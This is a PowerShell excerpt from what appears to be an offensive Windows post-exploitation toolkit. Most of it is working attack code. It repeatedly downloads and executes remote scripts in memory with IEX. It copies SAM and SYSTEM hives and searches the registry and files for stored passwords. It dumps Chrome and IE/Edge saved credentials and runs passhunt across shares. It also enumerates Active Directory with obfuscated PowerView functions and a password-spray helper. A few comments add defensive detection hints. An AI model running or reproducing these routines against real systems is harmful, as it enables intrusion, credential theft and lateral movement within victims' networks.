Write-Host -ForegroundColor Yellow 'Parsing Event logs for sensitive Information:'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/EventLogParser.exe' -Outfile "$currentPath\EventLogParser.exe"
.\EventLogParser.exe eventid=4103 outfile="$currentPath\LocalRecon\EventlogSensitiveInformations.txt"
.\EventLogParser.exe eventid=4104 outfile="$currentPath\LocalRecon\EventlogSensitiveInformations.txt"
if (isadmin){.\EventLogParser.exe eventid=4688 outfile="$currentPath\LocalRecon\EventlogSensitiveInformations.txt"}
#Check for WSUS Updates over HTTP
Write-Host -ForegroundColor Yellow 'Checking for WSUS over http'
$UseWUServer = (Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name UseWUServer -ErrorAction SilentlyContinue).UseWUServer
$WUServer = (Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name WUServer -ErrorAction SilentlyContinue).WUServer
if($UseWUServer -eq 1 -and $WUServer.ToLower().StartsWith("http://"))
{
Write-Host -ForegroundColor Yellow 'WSUS Server over HTTP detected, most likely all hosts in this domain can get fake-Updates!'
echo "Wsus over http detected! Fake Updates can be delivered here. $UseWUServer / $WUServer " >> "$currentPath\Vulnerabilities\WsusoverHTTP.txt"
}
#Check for SMB Signing
Write-Host -ForegroundColor Yellow 'Check SMB-Signing for the local system'
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-SMBNegotiate.ps1')
Invoke-SMBNegotiate -ComputerName localhost >> "$currentPath\Vulnerabilities\SMBSigningState.txt"
#Collecting Informations
Write-Host -ForegroundColor Yellow 'Collecting local system Informations for later lookup, saving them to .\LocalRecon\'
systeminfo >> "$currentPath\LocalRecon\systeminfo.txt"
Write-Host -ForegroundColor Yellow 'Getting Patches'
wmic qfe >> "$currentPath\LocalRecon\Patches.txt"
wmic os get osarchitecture >> "$currentPath\LocalRecon\Architecture.txt"
Write-Host -ForegroundColor Yellow 'Getting environment variables'
Get-ChildItem Env: | ft Key,Value >> "$currentPath\LocalRecon\Environmentvariables.txt"
Write-Host -ForegroundColor Yellow 'Getting connected drives'
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root >> "$currentPath\LocalRecon\Drives.txt"
Write-Host -ForegroundColor Yellow 'Getting current user Privileges'
whoami /priv >> "$currentPath\LocalRecon\Privileges.txt"
Get-LocalUser | ft Name,Enabled,LastLogon >> "$currentPath\LocalRecon\LocalUsers.txt"
Write-Host -ForegroundColor Yellow 'Getting local Accounts/Users + Password policy'
net accounts >> "$currentPath\LocalRecon\PasswordPolicy.txt"
Get-LocalGroup | ft Name >> "$currentPath\LocalRecon\LocalGroups.txt"
Write-Host -ForegroundColor Yellow 'Getting network interfaces, route information, Arp table'
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address >> "$currentPath\LocalRecon\Networkinterfaces.txt"
Get-DnsClientServerAddress -AddressFamily IPv4 | ft >> "$currentPath\LocalRecon\DNSServers.txt"
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex >> "$currentPath\LocalRecon\NetRoutes.txt"
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State >> "$currentPath\LocalRecon\ArpTable.txt"
netstat -ano >> "$currentPath\LocalRecon\ActiveConnections.txt"
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name Version, Release -ErrorAction 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version, Release >> "$currentPath\LocalRecon\InstalledDotNetVersions"
Write-Host -ForegroundColor Yellow 'Getting Shares'
net share >> "$currentPath\LocalRecon\Networkshares.txt"
Write-Host -ForegroundColor Yellow 'Getting hosts file content'
get-content $env:windir\System32\drivers\etc\hosts | out-string >> "$currentPath\LocalRecon\etc_Hosts_Content.txt"
Get-ChildItem -Path HKLM:\Software\*\Shell\open\command\ >> "$currentPath\LocalRecon\Test_for_Argument_Injection.txt"
Write-Host -ForegroundColor Yellow 'Searching for files with Full Control and Modify Access'
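Function Get-FireWallRule
{
<#
.SYNOPSIS
Lists Windows Firewall rules from the local HNetCfg.FwPolicy2 COM policy object, optionally filtered.
.DESCRIPTION
Reads the live rule set through the HNetCfg.FwPolicy2 COM interface and narrows it by whichever
filter parameters were supplied. Filters are ANDed; an omitted filter is not applied.
.PARAMETER Name
Wildcard pattern (-like) matched against the rule name.
.PARAMETER Direction
Exact match (-eq) on the rule's Direction value.
.PARAMETER Enabled
Exact match on the rule's Enabled flag. An explicitly passed $false is honoured (selects disabled
rules); omitting the parameter applies no filter.
.PARAMETER Protocol
Exact match on the rule's Protocol value.
.PARAMETER profile
Bitmask test (-bAND) against the rule's Profiles value. This parameter name shadows the automatic
$PROFILE variable inside the function; it is kept unchanged for caller compatibility.
.PARAMETER action
Exact match on the rule's Action value.
.PARAMETER grouping
Wildcard pattern (-like) matched against the rule's Grouping.
.OUTPUTS
The matching COM rule objects, in the order the policy object returns them.
#>
Param ($Name, $Direction, $Enabled, $Protocol, $profile, $action, $grouping)
# Live rule set; requires the Windows Firewall COM policy object, so this only works on Windows.
$Rules = (New-Object -ComObject HNetCfg.FwPolicy2).rules
If ($Name) { $Rules = $Rules | Where-Object { $_.name -like $Name } }
If ($Direction) { $Rules = $Rules | Where-Object { $_.direction -eq $Direction } }
# Test presence rather than truthiness: a plain "If ($Enabled)" silently ignored -Enabled $false,
# making it impossible to select disabled rules.
If ($PSBoundParameters.ContainsKey('Enabled') -and $null -ne $Enabled) { $Rules = $Rules | Where-Object { $_.Enabled -eq $Enabled } }
If ($Protocol) { $Rules = $Rules | Where-Object { $_.protocol -eq $Protocol } }
# Profiles is a bitmask (a rule can apply to several profiles), hence -bAND rather than -eq.
If ($profile) { $Rules = $Rules | Where-Object { $_.Profiles -bAND $profile } }
If ($action) { $Rules = $Rules | Where-Object { $_.Action -eq $action } }
If ($grouping) { $Rules = $Rules | Where-Object { $_.Grouping -like $grouping } }
$Rules
}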
Get-firewallRule -enabled $true | sort direction,name | format-table -property Name,localPorts,direction | out-string -Width 4096 >> "$currentPath\LocalRecon\Firewall_Rules.txt"
$output = " Files with Full Control and Modify Access`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$files = get-childitem C:\
foreach ($file in $files)
{
try {
$output = $output + (get-childitem "C:\$file" -include *.ps1,*.bat,*.com,*.vbs,*.txt,*.html,*.conf,*.rdp,.*inf,*.ini -recurse -EA SilentlyContinue | get-acl -EA SilentlyContinue | select path -expand access |
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|EVERYONE|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
}
catch
{
$output = $output + "`nFailed to read more files`r`n"
}
}
Write-Host -ForegroundColor Yellow 'Searching for folders with Full Control and Modify Access'
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Folders with Full Control and Modify Access`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$folders = get-childitem C:\
foreach ($folder in $folders)
{
try
{
$output = $output + (Get-ChildItem -Recurse "C:\$folder" -EA SilentlyContinue | ?{ $_.PSIsContainer} | get-acl | select path -expand access |
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
select path,filesystemrights,IdentityReference | ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
}
catch
{
$output = $output + "`nFailed to read more folders`r`n"
}
}
$output >> "$currentPath\LocalRecon\Files_and_Folders_with_Full_Modify_Access.txt"
Write-Host -ForegroundColor Yellow 'Checking for potential sensitive user files'
get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string >> "$currentPath\LocalRecon\Potential_Sensitive_User_Files.txt"
Write-Host -ForegroundColor Yellow 'Checking AlwaysInstallElevated'
$HKLM = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
$HKCU = "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"
if (($HKLM | test-path) -eq "True")
{
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
{
echo "AlwaysInstallElevated enabled on this host!" >> "$currentPath\Vulnerabilities\AlwaysInstallElevatedactive.txt"
}
}
if (($HKCU | test-path) -eq "True")
{
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
{
echo "AlwaysInstallElevated enabled on this host!" >> "$currentPath\Vulnerabilities\AlwaysInstallElevatedactive.txt"
}
}
Write-Host -ForegroundColor Yellow 'Checking if Netbios is active'
$EnabledNics= @(gwmi -query "select * from win32_networkadapterconfiguration where IPEnabled='true'")
$OutputObj = @()
foreach ($Network in $EnabledNics)
{
If($network.tcpipnetbiosoptions)
{
$netbiosEnabled = [bool]$network
if ($netbiosEnabled){Write-Host 'Netbios is active, vulnerability found.'; echo "Netbios Active, check localrecon folder for network interface Info" >> "$currentPath\Vulnerabilities\NetbiosActive.txt"}
}
$nic = gwmi win32_networkadapter | where {$_.index -match $network.index}
$OutputObj += @{
Nic = $nic.netconnectionid
NetBiosEnabled = $netbiosEnabled
}
}
$out = $OutputObj | % { new-object PSObject -Property $_} | select Nic, NetBiosEnabled| ft -auto
$out >> "$currentPath\LocalRecon\NetbiosInterfaceInfo.txt"
Write-Host -ForegroundColor Yellow 'Checking if IPv6 is active (mitm6 attacks)'
$IPV6 = $false
$arrInterfaces = (Get-WmiObject -class Win32_NetworkAdapterConfiguration -filter "ipenabled = TRUE").IPAddress
foreach ($i in $arrInterfaces) {$IPV6 = $IPV6 -or $i.contains(":")}
if ($IPV6){Write-Host 'IPv6 enabled, thats another vulnerability (mitm6)'; echo "IPv6 enabled, check all interfaces for the specific NIC" >> "$currentPath\Vulnerabilities\IPv6_Enabled.txt" }
Write-Host -ForegroundColor Yellow 'Collecting installed Software informations'
Get-Installedsoftware -Property DisplayVersion,InstallDate | out-string -Width 4096 >> "$currentPath\LocalRecon\InstalledSoftwareAll.txt"
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-Vulmap.ps1')
Write-Host -ForegroundColor Yellow 'Checking if Software is outdated and therefore vulnerable / exploitable'
Invoke-Vulmap | out-string -Width 4096 >> "$currentPath\Vulnerabilities\VulnerableSoftware.txt"
$passhunt = Read-Host -Prompt 'Do you want to search for Passwords on this system using passhunt.exe? (Its worth it) (yes/no)'
if ($passhunt -eq "yes" -or $passhunt -eq "y" -or $passhunt -eq "Yes" -or $passhunt -eq "Y")
{
passhunt -local $true
}
# Collecting more information
Write-Host -ForegroundColor Yellow 'Checking for accesible SAM/SYS Files'
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP'){Get-ChildItem -path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP' -Recurse >> "$currentPath\LocalRecon\SNMP.txt"}
If (Test-Path -Path %SYSTEMROOT%\repair\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\repair\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\System32\config\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\RegBack\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\System32\config\RegBack\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\System32\config\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\repair\system){Write-Host -ForegroundColor Yellow "SYS File reachable, looking for SAM?";copy %SYSTEMROOT%\repair\system "$currentPath\Vulnerabilities\SYS"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\SYSTEM){Write-Host -ForegroundColor Yellow "SYS File reachable, looking for SAM?";copy %SYSTEMROOT%\System32\config\SYSTEM "$currentPath\Vulnerabilities\SYS"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\RegBack\system){Write-Host -ForegroundColor Yellow "SYS File reachable, looking for SAM?";copy %SYSTEMROOT%\System32\config\RegBack\system "$currentPath\Vulnerabilities\SYS"}
Write-Host -ForegroundColor Yellow 'Checking Registry for potential passwords'
REG QUERY HKLM /F "passwor" /t REG_SZ /S /K >> "$currentPath\LocalRecon\PotentialHKLMRegistryPasswords.txt"
REG QUERY HKCU /F "password" /t REG_SZ /S /K >> "$currentPath\LocalRecon\PotentialHKCURegistryPasswords.txt"
Write-Host -ForegroundColor Yellow 'Checking sensitive registry entries..'
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon')
{
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" >> "$currentPath\LocalRecon\Winlogon.txt"
}
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\Current\ControlSet\Services\SNMP'){reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" >> "$currentPath\LocalRecon\SNMPParameters.txt"}
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Software\SimonTatham\PuTTY\Sessions'){reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" >> "$currentPath\Vulnerabilities\PuttySessions.txt"}
If (Test-Path -Path 'Registry::HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password'){reg query "HKCU\Software\ORL\WinVNC3\Password" >> "$currentPath\Vulnerabilities\VNCPassword.txt"}
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4'){reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password >> "$currentPath\Vulnerabilities\RealVNCPassword.txt"}
If (Test-Path -Path C:\unattend.xml){copy C:\unattend.xml "$currentPath\Vulnerabilities\unattended.xml"; Write-Host -ForegroundColor Yellow 'Unattended.xml Found, check it for passwords'}
If (Test-Path -Path C:\Windows\Panther\Unattend.xml){copy C:\Windows\Panther\Unattend.xml "$currentPath\Vulnerabilities\unattended.xml"; Write-Host -ForegroundColor Yellow 'Unattended.xml Found, check it for passwords'}
If (Test-Path -Path C:\Windows\Panther\Unattend\Unattend.xml){copy C:\Windows\Panther\Unattend\Unattend.xml "$currentPath\Vulnerabilities\unattended.xml"; Write-Host -ForegroundColor Yellow 'Unattended.xml Found, check it for passwords'}
If (Test-Path -Path C:\Windows\system32\sysprep.inf){copy C:\Windows\system32\sysprep.inf "$currentPath\Vulnerabilities\sysprep.inf"; Write-Host -ForegroundColor Yellow 'Sysprep.inf Found, check it for passwords'}
If (Test-Path -Path C:\Windows\system32\sysprep\sysprep.xml){copy C:\Windows\system32\sysprep\sysprep.xml "$currentPath\Vulnerabilities\sysprep.inf"; Write-Host -ForegroundColor Yellow 'Sysprep.inf Found, check it for passwords'}
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue >> "$currentPath\Vulnerabilities\webconfigfiles.txt"
Write-Host -ForegroundColor Yellow 'List running tasks'
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize >> "$currentPath\LocalRecon\RunningTasks.txt"
Write-Host -ForegroundColor Yellow 'Checking for usable credentials (cmdkey /list)'
cmdkey /list >> "$currentPath\Vulnerabilities\SavedCredentials.txt" # runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
$dotnet = Read-Host -Prompt 'Do you want to search for .NET Binaries on this system? (theese can be easily reverse engineered for vulnerability analysis) (yes/no)'
if ($dotnet -eq "yes" -or $dotnet -eq "y" -or $dotnet -eq "Yes" -or $dotnet -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Searching for Files - Output is saved to the localrecon folder:'
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-DotNetServices.ps1')
Get-DotNetServices >> "$currentPath\LocalRecon\DotNetBinaries.txt"
}
if (isadmin)
{
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1'');Invoke-HostEnum >> .\LocalRecon\HostEnum.txt}'
$PSrecon = Read-Host -Prompt 'Do you want to gather local computer Informations with PSRecon? (yes/no)'
if ($PSrecon -eq "yes" -or $PSrecon -eq "y" -or $PSrecon -eq "Yes" -or $PSrecon -eq "Y")
{
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;Invoke-WebRequest -Uri ''https://raw.githubusercontent.com/gfoss/PSRecon/master/psrecon.ps1'' -Outfile .\LocalRecon\Psrecon.ps1;Write-Host -ForegroundColor Yellow ''Starting PsRecon:'';.\LocalRecon\Psrecon.ps1;pause}'
}
Write-Host -ForegroundColor Yellow 'Saving general computer information to .\LocalRecon\Computerdetails.txt:'
Get-ComputerDetails >> "$currentPath\LocalRecon\Computerdetails.txt"
Write-Host -ForegroundColor Yellow 'Starting WINSpect:'
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/A-mIn3/WINspect/master/WINspect.ps1'');}'
}
$session = Read-Host -Prompt 'Do you want to start SessionGopher module? (yes/no)'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
sessionGopher
}
$search = Read-Host -Prompt 'Do you want to search for sensitive files on this local system? (config files, rdp files, password files and more) (yes/no) - takes a lot of time'
if ($search -eq "yes" -or $search -eq "y" -or $search -eq "Yes" -or $search -eq "Y")
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/find-interesting.ps1')
Write-Host -ForegroundColor Yellow 'Looking for interesting files:'
Find-InterestingFile -Path 'C:\' -Outfile "$currentPath\LocalRecon\InterestingFiles.txt"
Find-InterestingFile -Path 'C:\' -Terms pass,login,rdp,kdbx,backup -Outfile "$currentPath\LocalRecon\MoreFiles.txt"
}
$chrome = Read-Host -Prompt 'Dump Chrome Browser history and maybe passwords? (yes/no)'
if ($chrome -eq "yes" -or $chrome -eq "y" -or $chrome -eq "Yes" -or $chrome -eq "Y")
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-ChromeDump.ps1')
Install-SqlLiteAssembly
Get-ChromeDump >> "$currentPath\Exploitation\Chrome_Credentials.txt"
Get-ChromeHistory >> "$currentPath\LocalRecon\ChromeHistory.txt"
Write-Host -ForegroundColor Yellow 'Done, look in the localrecon folder for creds/history:'
}
$IE = Read-Host -Prompt 'Dump IE / Edge Browser passwords? (yes/no)'
if ($IE -eq "yes" -or $IE -eq "y" -or $IE -eq "Yes" -or $IE -eq "Y")
{
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } >> "$currentPath\Exploitation\InternetExplorer_Credentials.txt"
}
$browserinfos = Read-Host -Prompt 'Dump all installed Browser history and bookmarks? (yes/no)'
if ($browserinfos -eq "yes" -or $browserinfos -eq "y" -or $browserinfos -eq "Yes" -or $browserinfos -eq "Y")
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-BrowserInformation.ps1')
Get-BrowserInformation >> "$currentPath\LocalRecon\AllBrowserHistory.txt"
}
}
function passhunt
{
<#
.DESCRIPTION
Search for hashed or cleartext passwords on the local system or on the domain.
Author: @SecureThisShit
License: BSD 3-Clause
.PARAMETER local
When $true: downloads passhunt.exe into $currentPath, starts it against the local system, and
optionally starts one instance per share exposed by this host (Win32_Share).
.PARAMETER domain
When $true: enumerates active Windows Servers and their shares through the obfuscated helper
scripts loaded below, then starts one passhunt.exe process per share found.
.NOTES
Control flow: the -domain block is an independent 'if'; the -local block carries an 'else' that
also downloads and runs passhunt.exe locally whenever $local is not $true, so a call with only
-domain $true performs the local run as well.
Every helper script is fetched over HTTPS and executed in-memory with IEX; no integrity check of
the downloaded content is performed. Defenders: the resulting activity is visible through
script block logging of the IEX'd content and through child powershell.exe processes spawned
via "cmd /c start powershell".
#>
#Local/Domain Recon / Privesc
Param
(
[bool]
$local,
[bool]
$domain
)
# pathcheck is defined elsewhere in this file; presumably it creates the output folders used below — confirm.
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
# Loads an obfuscated helper script into this session; Get-DomainComputer and brainstorm (used below) are presumably defined there.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/viewdevobfs.ps1')
if ($domain)
{
Write-Host -ForegroundColor Yellow 'Collecting active Windows Servers from the domain...'
$ActiveServers = Get-DomainComputer -Ping -OperatingSystem "Windows Server*"
$ActiveServers.dnshostname >> "$currentPath\DomainRecon\activeservers.txt"
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/viewobfs.ps1')
Write-Host -ForegroundColor Yellow 'Searching for Shares on the found Windows Servers...'
brainstorm -ComputerFile "$currentPath\DomainRecon\activeservers.txt" -NoPing -CheckShareAccess | Out-File -Encoding ascii "$currentPath\DomainRecon\found_shares.txt"
$shares = Get-Content "$currentPath\DomainRecon\found_shares.txt"
# Keeps only the first space-separated token of each line (presumably the share path); the other columns are dropped.
$testShares = foreach ($line in $shares){ echo ($line).Split(' ')[0]}
Write-Host -ForegroundColor Yellow 'Starting Passhunt.exe for all found shares.'
if (test-path $currentPath\passhunt.exe)
{
foreach ($line in $testShares)
{
# $line originates from share names reported by remote hosts and is interpolated unquoted into a
# cmd/powershell command line; a name containing shell metacharacters would change the command run here.
cmd /c start powershell -Command "$currentPath\passhunt.exe -s $line"
}
}
else
{
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/blob/master/exeFiles/passhunt.exe' -Outfile $currentPath\passhunt.exe
foreach ($line in $shares)
{
# Same unquoted interpolation of remote-supplied data as above.
cmd /c start powershell -Command "$currentPath\passhunt.exe -s $line"
}
}
}
if ($local)
{
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/blob/master/exeFiles/passhunt.exe' -Outfile $currentPath\passhunt.exe
cmd /c start powershell -Command "$currentPath\passhunt.exe"
$sharepasshunt = Read-Host -Prompt 'Do you also want to search for Passwords on all connected networkshares?'
if ($sharepasshunt -eq "yes" -or $sharepasshunt -eq "y" -or $sharepasshunt -eq "Yes" -or $sharepasshunt -eq "Y")
{
# Written to the process working directory (not $currentPath). The -skip 4 presumably drops
# Format-Table's leading blank/header/separator lines — verify it does not also drop the first share.
get-WmiObject -class Win32_Share | ft Path >> passhuntshares.txt
$shares = get-content .\passhuntshares.txt | select-object -skip 4
foreach ($line in $shares)
{
cmd /c start powershell -Command "$currentPath\passhunt.exe -s $line"
}
}
}
else
{
# Reached whenever $local is not $true — including a call with only -domain $true — so the domain
# run above is followed by a local passhunt.exe run as well.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/blob/master/exeFiles/passhunt.exe' -Outfile $currentPath\passhunt.exe
cmd /c start powershell -Command "$currentPath\passhunt.exe"
}
}
function domainreconmodules
{
<#
.DESCRIPTION
All domain recon scripts are executed here.
Author: @securethisshit
License: BSD 3-Clause
.NOTES
Takes no parameters; the only inputs are interactive Read-Host prompts for the optional
sub-checks (domain share files, ACL analysis, PowerUpSQL, MS-RPRN spooler scan, MS17-10,
share password search, GPO audit), each of which calls a helper defined elsewhere in this file.
Artifacts are appended under "$currentPath\DomainRecon" and "$currentPath\Vulnerabilities".
Many helper names below (skulked, televisions, prostituted, breviaries, ...) come from the
obfuscated script fetched at the top of the function; the output filename next to each call is
the only hint of what it does, so those mappings are not verified here.
All remote scripts are fetched over HTTPS and executed in memory with IEX without any integrity
check of the downloaded content.
#>
#Domain / Network Reconing
# $currentPath is captured before pathcheck here, whereas passhunt calls pathcheck first —
# confirm pathcheck does not change the working directory.
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
# Presumably provides Get-DomainUserList (used below) — confirm against the fetched script.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/DomainPasswordSpray.ps1')
# Obfuscated helper set; presumably the source of the odd function names used in this function.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/view.ps1')
$domain_Name = skulked
# $Domain is assigned but not read again in this function.
$Domain = $domain_Name.Name
Write-Host -ForegroundColor Yellow 'Starting Domain Recon phase:'
Write-Host -ForegroundColor Yellow 'Creating Domain User-List:'
Get-DomainUserList -Domain $domain_Name.Name -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii "$currentPath\DomainRecon\userlist.txt"
Write-Host -ForegroundColor Yellow 'Searching for Exploitable Systems:'
inset >> "$currentPath\DomainRecon\ExploitableSystems.txt"
#Powerview
Write-Host -ForegroundColor Yellow 'All those PowerView Network Skripts for later Lookup getting executed and saved:'
# A terminating error in any call below skips the remaining calls of this block; the catch
# only prints a generic message, so partial output files are the only trace of where it stopped.
try{
skulked >> "$currentPath\DomainRecon\NetDomain.txt"
televisions >> "$currentPath\DomainRecon\NetForest.txt"
misdirects >> "$currentPath\DomainRecon\NetForestDomain.txt"
odometer >> "$currentPath\DomainRecon\NetDomainController.txt"
Houyhnhnm >> "$currentPath\DomainRecon\NetUser.txt"
Randal >> "$currentPath\DomainRecon\NetSystems.txt"
Get-Printer >> "$currentPath\DomainRecon\localPrinter.txt"
damsels >> "$currentPath\DomainRecon\NetOU.txt"
xylophone >> "$currentPath\DomainRecon\NetSite.txt"
ignominies >> "$currentPath\DomainRecon\NetSubnet.txt"
reapportioned >> "$currentPath\DomainRecon\NetGroup.txt"
confessedly >> "$currentPath\DomainRecon\NetGroupMember.txt"
aqueduct >> "$currentPath\DomainRecon\NetFileServer.txt"
marinated >> "$currentPath\DomainRecon\DFSshare.txt"
liberation >> "$currentPath\DomainRecon\NetShare.txt"
# Only output file in this block without a .txt extension.
cherubs >> "$currentPath\DomainRecon\NetLoggedon"
Trojans >> "$currentPath\DomainRecon\Domaintrusts.txt"
sequined >> "$currentPath\DomainRecon\ForestTrust.txt"
ringer >> "$currentPath\DomainRecon\ForeignUser.txt"
condor >> "$currentPath\DomainRecon\ForeignGroup.txt"
}catch{Write-Host "Got an error"}
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/viewdevobfs.ps1')
breviaries -Printers >> "$currentPath\DomainRecon\DomainPrinters.txt"
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SPN-Scan.ps1')
Discover-PSInterestingServices >> "$currentPath\DomainRecon\SPNScan_InterestingServices.txt"
#Search for AD-Passwords in description fields
Write-Host -ForegroundColor Yellow 'Searching for passwords in active directory description fields..'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-Webrequest -Uri 'https://github.com/SecureThisShit/Creds/raw/master/Microsoft.ActiveDirectory.Management.dll' -Outfile "$currentPath\Microsoft.ActiveDirectory.Management.dll"
# Downloaded to $currentPath but imported from the relative ".\" — only equivalent while the working directory is $currentPath.
Import-Module .\Microsoft.ActiveDirectory.Management.dll
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/adpass.ps1')
thyme >> "$currentPath\DomainRecon\Passwords_in_description.txt"
Write-Host -ForegroundColor Yellow 'Searching for Users without password Change for a long time'
# One year ago as a Windows FILETIME, the representation pwdlastset uses in the LDAP filter below.
$Date = (Get-Date).AddYears(-1).ToFileTime()
